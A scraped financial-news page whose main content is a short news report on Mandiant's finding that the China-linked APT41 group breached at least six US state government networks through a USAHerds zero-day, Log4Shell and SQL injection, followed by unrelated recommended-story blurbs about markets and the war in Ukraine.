U.S. markets close in 4 hours 12 minutes

  • S&P 500

    4,178.92
    -22.17 (-0.53%)
     

  • Dow 30

    32,722.39
    -94.99 (-0.29%)
     

  • Nasdaq

    12,748.92
    -82.04 (-0.64%)
     

  • Russell 2000

    1,959.18
    +7.85 (+0.40%)
     

  • Crude Oil

    128.41
    +9.01 (+7.55%)
     

  • Gold

    2,067.90
    +72.00 (+3.61%)
     

  • Silver

    27.32
    +1.60 (+6.20%)
     

  • EUR/USD

    1.0884
    +0.0028 (+0.26%)
     

  • 10-Yr Bond

    1.8510
    +0.1000 (+5.71%)
     

  • GBP/USD

    1.3101
    -0.0008 (-0.06%)
     

  • USD/JPY

    115.6510
    +0.3420 (+0.30%)
     

  • BTC-USD

    38,246.16
    -826.35 (-2.11%)
     

  • CMC Crypto 200

    857.77
    -3.73 (-0.43%)
     

  • FTSE 100

    6,966.81
    +7.33 (+0.11%)
     

  • Nikkei 225

    24,790.95
    -430.46 (-1.71%)
     

China-backed APT41 compromised 'at least' six US state governments

Carly Page
·2 min read

The prolific China APT41 hacking group, known for carrying out espionage in parallel with financially motivated operations, has compromised multiple U.S. state government networks, according to cybersecurity giant Mandiant.

The group — seemingly undeterred by U.S. indictments against five APT41 members in 2020 — conducted a months-long campaign during which it targeted and successfully breached at least six U.S. state networks, all of which have been notified by Mandiant but were not named.

Between May 2021 and February 2022, the hacking group used vulnerable internet-facing web applications to gain an initial foothold into state networks. This included exploiting a zero-day vulnerability in a software application called USAHerds, used by 18 states for animal health management, and the now-infamous so-called Log4Shell vulnerability in Apache Log4j, a ubiquitous Java logging library.

Mandiant said APT41 began exploiting Log4Shell within hours of the Apache Foundation publicly sounding the alarm about the vulnerability in December 2021, which led to the compromise of two U.S. state government networks and other targets in the insurance and telecoms industries. After gaining that foothold on the network, APT41 went on to perform "extensive" credential collection.

The investigation also uncovered a variety of new techniques, evasion methods, and capabilities used by APT41. In one instance after APT41 gained access to a network via SQL injection vulnerability in a proprietary web application — activity that was contained by Mandiant — APT41 came back two weeks later to recompromise the network with a brand new zero-day exploit. The group also tailored its malware to their victim’s environments and frequently updated the encoded data on a specific forum post, enabling the malware to receive instructions from the attackers' command and control server.

Though Mandiant said it saw evidence of the hackers exfiltrating personally identifiable information that's typically consistent with an espionage operation, the goal of the campaign remains unclear but that whatever the group is after, it must be of high value.

Geoff Ackerman, principal threat analyst at Mandiant, said that while the world is focused on the potential of Russian cyber threats in the wake of the invasion of Ukraine, this investigation is a reminder that other major threat actors around the world are continuing their operations as usual.

“We cannot allow other cyber activity to fall to the wayside, especially given our observations that this campaign from APT41, one of the most prolific threat actors around, continues to this day,” said Ackerman. “APT41 is truly a persistent threat, and this recent campaign is another reminder that state-level systems in the United States are under unrelenting pressure from nation-state actors like China, as well as Russia.”

Justice Department charges five Chinese members of APT41 over cyberattacks on US companies

Recommended Stories

  • Tampa's BRP Group strikes $385M acquisition deal for California agency

    Tampa Bay-based BRP Group (NASDAQ: BRP) is acquiring California-based Westwood Insurance Agency for $385 million — the largest deal of its kind for the company. Separately, Millennial Specialty Insurance LLC, BRP’s platform, will assume operations of a $200 million builder-sourced homeowners book from affiliates of QBE Holdings Inc., Westwood’s holding company. BRP’s Chief Partnership Officer John Valentine said Westwood’s product class, embedded channels, proprietary tech platform and track record of double-digit organic revenue growth make the company a “rare business.”

  • $150 Nordstrom waterproof sneakers are perfect for spring — but they're selling out

    Chic sneakers that keep your feet warm and try? Sign us up.

  • Alanis Morissette Extends “Jagged Little Pill Tour” into 2022

    Morissette will once again be joined on the road by Garbage. Alanis Morissette Extends “Jagged Little Pill Tour” into 2022 Alex Young

  • Luxury carmaker Ferrari suspends production of vehicles for Russian market

    Luxury carmaker Ferrari said on Tuesday it would suspend exports to Russia due to Moscow's invasion of Ukraine. "Given the ongoing situation Ferrari has taken the decision to suspend the production of vehicles for the Russian market until further notice," the Italian company said in a statement. Ferrari adds to a number of companies, including carmakers, other manufacturers and luxury goods groups, that have taken action to limit, put on hold or exit business activities in Russia following Moscow's invasion of Ukraine.

  • China Sees Record Bond-Market Retreat by Foreign Investors

    (Bloomberg) -- Foreign investors reduced their holdings of Chinese government bonds by the most ever last month as Russia’s invasion of Ukraine roiled fixed-income markets worldwide. Most Read from BloombergUkraine Update: Russia’s Gas Threat; Cease-Fire Talks StruggleChina Warns U.S. Over Forming Pacific NATO, Backing TaiwanBiden to Sign Crypto Order as Firms Face Sanctions PressureCovid Can Shrink the Brain as Much as a Decade of Aging, Study FindsHypersonic-Missile Failures Risk U.S. Chase of

  • Pakistani premier hits out at Western envoys' joint letter on Russia

    Pakistani Prime Minister Imran Khan hit out on Sunday at Islamabad-based Western envoys who last week urged Pakistan to condemn Russia's actions in Ukraine, asking them if they thought Pakistan was their "slave". The heads of 22 diplomatic missions, including those of European Union member states, released a joint letter on March 1 urging Pakistan to support a resolution in the United Nations General Assembly condemning Russia's aggression against Ukraine.

  • 2022 NFL mock draft roundup: Eagles load up on defensive talent after combine performances

    2022 #NFL mock draft roundup: #Philadelphia #Eagles load up on defensive talent from the #SEC #Big10 #Pac12 #NFLDraft2022 #NFLCombine

  • Biden Administration Is ‘Misusing Facts’ on Oil Permits, API Says

    (Bloomberg) -- The head of the biggest U.S. oil lobby groups said the Biden administration is “misusing facts” when it claims the industry has more than 9,000 federal drilling permits on which it can drill to boost supply and ease soaring energy prices. Most Read from BloombergUkraine Update: Global Stocks Plunge; Russia Threatens Gas FlowChina Warns U.S. Over Forming Pacific NATO, Backing TaiwanBiden to Sign Crypto Order as Firms Face Sanctions PressureCovid Can Shrink the Brain as Much as a De

  • Russia-Ukraine war causing ‘complete chaos for the shipping industry,’ AEI fellow says

    American Enterprise Institute Resident Fellow Elisabeth Braw joins Yahoo Finance Live to discuss how the Russia-Ukraine war is affecting global supply chains, sanctions on Russian oil, and potential shifts in globalization.

  • Cloudflare, Akamai resist calls to stop protecting Russia from protest cyber attacks

    The reponses come after Ukraine-founded cybersecurity startup SOC Prime called for all U.S.-based tech companies to suspend sales and business services to Russia.

  • Coca-Cola, Citi Bank, Starbucks among companies staying open in Russia

    Yahoo Finance's Rick Newman breaks down the companies still operating in Russia and their reasoning.

  • US Wages Are 20% Lower Due to Lack of Competition Among Employers: Report

    As the Biden administration works to promote what it calls its pro-labor agenda, a new analysis by the Treasury Department finds that monopsony power – a market structure in which there is only one buyer – among employers throughout the U.S. economy has reduced wages by roughly 20% on average. “While most labor markets do not literally feature a single employer, a market with a small set of employers may mimic a monopsony by each engaging in practices that give them market power over workers,” t

  • Brazil's Bolsonaro wants Petrobras to end global fuel parity policy

    BRASILIA (Reuters) -Brazilian President Jair Bolsonaro on Monday threw his weight behind measures to tamp down domestic fuel prices after the Ukraine conflict sent oil prices to their highest levels since 2008, adding to pressure on state-run oil company Petrobras. A government official told Reuters on condition of anonymity that the Bolsonaro administration is studying a fuel subsidy program. The economy ministry is against such a measure, the source said, but is not involved in deciding the pricing policy of Petroleo Brasileiro SA, as the state firm is officially known.

  • It’s Not Too Late for Keystone XL, Alberta’s Premier Says

    (Bloomberg) -- TC Energy Corp.’s Keystone XL crude pipeline could be built by the first quarter of next year if the Biden administration were to reverse its decision to cancel the project.Most Read from BloombergUkraine Update: Russia’s Gas Threat; Cease-Fire Talks StruggleChina Warns U.S. Over Forming Pacific NATO, Backing TaiwanBiden to Sign Crypto Order as Firms Face Sanctions PressureCovid Can Shrink the Brain as Much as a Decade of Aging, Study FindsHypersonic-Missile Failures Risk U.S. Cha

  • U.K. Plans to Ban Russian Oil Imports in New Sanctions Move

    (Bloomberg) -- The U.K. government will ban all imports of Russian oil, its latest sanctions move against Vladimir Putin’s administration over the war in Ukraine. Most Read from BloombergUkraine Update: Russia’s Gas Threat; Cease-Fire Talks StruggleChina Warns U.S. Over Forming Pacific NATO, Backing TaiwanBiden to Sign Crypto Order as Firms Face Sanctions PressureCovid Can Shrink the Brain as Much as a Decade of Aging, Study FindsU.S. Spies See Grim Global Outlook With Russia, China Top FoesThe

  • 5 new sanctions the U.S. may slap on Russia for its war with Ukraine

    The West has many more actions it could take against Russia for its war on Ukraine, says Goldman Sachs.

  • ‘We f****** hit them’: Russian warship that attacked Snake Island soldiers ‘destroyed’

    Video footage appears to show Ukrainian navy exchanging fire with Russian ships as it defends the Black Sea port of Odessa

  • Russian Officer Complains About Dead General and Comms Meltdown in Intercepted Call

    Irina Rybakova/Press service of the Ukrainian ground forces/ReutersThe Ukrainian defence ministry has released audio from a call which it claims captured two Russian officers lamenting the death of a top general and the collapse of its secure communications network in Ukraine.In the call—which has been verified by Bellingcat, the fact-checking group known for exposing Kremlin misinformation—two purported Russian FSB officers are heard discussing the death of a general killed in fighting near Kha

  • Cheniere Says New LNG Sold Out Into 2040s: CERAWeek Update

    (Bloomberg) -- It’s the opening day of CERAWeek by S&P Global in Houston, one of the energy industry’s biggest annual gatherings and one that hasn’t been held in person in three years because of the pandemic.Most Read from BloombergUkraine Update: Russia’s Gas Threat; Cease-Fire Talks StruggleChina Warns U.S. Over Forming Pacific NATO, Backing TaiwanBiden to Sign Crypto Order as Firms Face Sanctions PressureCovid Can Shrink the Brain as Much as a Decade of Aging, Study FindsHypersonic-Missile Fa

  • Russian rouble stabilises in offshore trade after heavy losses

    The local market was closed for a public holiday, with currency trading expected to resume on Wednesday. The rouble has fallen more than 40% against the dollar since the start of the year, with losses sharply accelerating after Russia invaded Ukraine on Feb. 24, a move that sparked sweeping sanctions from governments around the world. Curbs on Russia and on its lenders, companies and key individuals, as well as counter measures from Moscow, have made it increasingly difficult for investors to trade Russian assets.